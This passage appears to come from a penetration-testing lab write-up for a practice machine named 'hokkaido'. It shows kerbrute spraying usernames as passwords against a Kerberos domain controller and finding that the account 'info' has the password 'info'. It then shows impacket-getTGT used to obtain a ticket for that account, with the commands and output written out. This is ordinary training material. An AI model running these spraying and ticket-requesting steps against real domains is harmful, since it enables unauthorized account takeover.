Password Spray
3 valid domain user have been discovered through a brute-force attack against the target KDC service. While no password is known at this time, I will attempt to perform a password spraying attack with their username as password
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ kerbrute passwordspray --dc dc.hokkaido-aerospace.com -d HOKKAIDO-AEROSPACE.COM --user-as-pass ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/25/25 - Ronnie Flathers @ropnop
2025/04/25 14:49:25 > Using KDC(s):
2025/04/25 14:49:25 > dc.hokkaido-aerospace.com:88
2025/04/25 14:49:26 > [+] VALID LOGIN: info@HOKKAIDO-AEROSPACE.COM:info
2025/04/25 14:49:26 > Done! Tested 4 logins (1 successes) in 0.121 secondsPerforming a password spraying attack with the --user-as-pass flag to test username as password
The info account has its password set to info
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/info@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: info
[*] Saving ticket in info@dc.hokkaido-aerospace.com.ccacheValidated
TGT generated for the info account